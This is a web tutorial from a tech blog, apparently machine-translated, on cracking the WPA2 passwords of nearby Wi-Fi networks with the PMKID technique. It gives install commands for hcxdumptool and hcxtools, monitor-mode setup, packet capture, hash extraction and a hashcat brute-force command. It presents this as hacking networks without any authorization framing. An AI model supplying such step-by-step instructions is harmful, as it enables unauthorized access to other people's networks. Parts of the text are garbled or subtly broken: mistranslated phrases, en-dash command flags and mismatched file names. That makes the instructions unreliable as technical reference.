• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Instructions for Hacking Wifi Password with Hashcat -PMKID

AnonyViet by AnonyViet
January 29, 2023
in Security
0

The WPA2 Wifi Password Hack has been almost the same for many years now. Now there is a new Wifi attack method that is less complex than the traditional methods, especially can target access points where no one is connected. This method uses Hashcat to decrypt -PMKID packets to crack WPA passwords and allow Hackers to find networks with weak passwords more easily.

Join the channel Telegram of the AnonyViet 👉 Link 👈

Classic WIFI Password Hack Method

The old way to crack WPA2 has been around for quite some time and involves disconnecting a device from the access point. This has two very important disadvantages for Wi-Fi hackers.

The first downside is that there must be a device connected to Wifi. Wifi passwords can be weak and very easy to crack, but without a device connected, there is no chance for a handshake, so there is no chance to attempt a crack.

The second disadvantage, forcing you to send packets to is to disconnect the device from Wifi. This type of unauthorized interference is technically a denial of service attack, the equivalent of network jamming. This can get you into trouble and can be easily detected by some other software.

Method of Hacking WIFI Password with Hashcat

Instead of relying on intercepting two-way communication between Wi-Fi devices to crack passwords, Hackers can communicate directly with the Wifi access point using a new method. On August 4, 2018, a Hashcat forum post detailed a new technique that leverages an attack against RSN IE (Robust Security Network Information Element) to capture the necessary information and perform Brute. -force.

Similar to WPA attacks, Hackers must capture the Wifi wave they want to attack. The way is to use a Kali Linux compatible Wifi USB flash drive to try to brute-force the password. Instead of using Aireplay-ng or Aircrack-ng, AnonyViet will guide you to use a new Wifi Password Hack tool called hcxtool.

Advantage:

  • Tiger becomes multiple encryption algorithms.
  • Password decryption success rate is high.

Defect:

  • Hardware configuration is required to perform decoding (CPU, GPU).
  • Decoding time depends on computer hardware.

Hcxdumptool and hcxpcaptool are tools used to test the security of Wifi. This tool has the function of scanning for Wifi waves near your area. Then capture the WPA and PMKID handshake packet. After obtaining the PMKID packet, you will use the hash to Hashcat and crack the password. The success rate of cracking depends on the Password dictionary you have. AnonyViet will provide you with a set of Password dictionarymost useless today.

Prepare wifi hacking tool

USB Wifi supports today’s popular Wifi Password Hack:

  • TP-Link TL-WN722N v1
  • Tenda W311MA
  • Alfa AWUS036NEH
  • Alfa AWUS051NH v2
  • Alfa AWUS036NHA
  • Alfa AWUS036H
  • Alfa AWHUS036 SMALL
  • Panda PAU05

Prepare wifi hacking tool

• hcxdumptool
• hcxtools

Install the required package:

Start Kali Linux and open a terminal and type the following command:

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install
cd

To install hcxtools you type the command:

apt-get update –y
apt-get update
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install
cd

Finally, you need to install Hashcat. Usually Hashcat will be available in the Kali Linux repo. Just type the following to install the latest version of Hashcat.

apt install hashcat

Connect USB Wifi with VMWare

Attach the USB Wifi receiver to your computer. Make a USB Wifi connection with the Kali Linux virtual machine.

Connect USB Wifi with VMWare

Continue typing the command below in Terminal:

ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

Capture PMKID . packets

Now we will start the attack to capture the PMKID packet. Turn off your home’s Wifi Routers for easy implementation. Now use the following command to run hcxdumptool :

Hcxdumptool –I wlan0 –-enable_status=1 –o dump-data.pcapng

If you get a message like:

“NetworkManager is running with pid 1022”
Or
"wpa_supplicant is running with pid 2231"

You can turn off notifications with the command:

kill 1022
kill 2231

Replace 1022, 2231 with the PID you see on the screen.

Run again hcxdumptool half once:

Hcxdumptool –I wlan0 –-enable_status=1 –o dump-data.pcapng

You let the program run for more than 10 minutes to collect Wifi packets that need Hack Password. Then stop by key combination Ctrl + C

Now you will see in the folder there is a file named dump-data.pcapng. This is the file containing the contents of the captured packets. Use the following command to output the PMKID packet from the file dump-data.pcapng.

hcxpcaptool -z hashes.txt dump-data.pcapng

The extracted content will be in the folder hashes.txt (if error message, please create an empty hashes.txt file yourself).

To find out which Hash of which Wifi, you look at the MAC address of the Wifi device. In the picture below you can see the Hash showing the Wifi MAC address.

hash mac addressTo see which Wifi device has which MAC address, corresponding to the SSID (Wifi name), you use the command below:

airmon-ng start wlan0
airodump-ng wlan0mon

mac address name wifi

Brute Force Password Wifi with Hashcat

Now you decode the Hash to Plain Text using Worldlist. Let’s put the Wordlist file in the same folder as hashes.txt.

hashcat –m 16800 –w 4 hash.txt (tên-file-worldlist).txt

If the Hash code matches the Password in the Worldlist, you will receive the Password to access Wifi corresponding to the Hash code and Mac Adress.

Instructions for Hacking Wifi Password with Hashcat -PMKID

The article achieved: 5/5 – (101 votes)

Tags: hackingHashcatInstructionsPasswordPMKIDWiFi
Previous Post

Who leaked Windows 11?

Next Post

3 coolest ways to turn off your computer

AnonyViet

AnonyViet

Related Posts

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS
Security

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Next Post
3 coolest ways to turn off your computer

3 coolest ways to turn off your computer

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

How to create a Face Sticker Collection using ChatGPT

How to create a Face Sticker Collection using ChatGPT

April 29, 2026
How to install the cute Bongo Cat mouse pointer for Windows

How to install the cute Bongo Cat mouse pointer for Windows

April 29, 2026
Tips for pinning the step counter to the iPhone screen to monitor your health

Tips for pinning the step counter to the iPhone screen to monitor your health

April 28, 2026
How to turn off password suggestions on iPhone: Prevent Safari from auto-filling passwords

How to turn off password suggestions on iPhone: Prevent Safari from auto-filling passwords

April 27, 2026
How to create a Face Sticker Collection using ChatGPT

How to create a Face Sticker Collection using ChatGPT

April 29, 2026
How to install the cute Bongo Cat mouse pointer for Windows

How to install the cute Bongo Cat mouse pointer for Windows

April 29, 2026
Tips for pinning the step counter to the iPhone screen to monitor your health

Tips for pinning the step counter to the iPhone screen to monitor your health

April 28, 2026
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to create a Face Sticker Collection using ChatGPT

How to create a Face Sticker Collection using ChatGPT

April 29, 2026
How to install the cute Bongo Cat mouse pointer for Windows

How to install the cute Bongo Cat mouse pointer for Windows

April 29, 2026
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply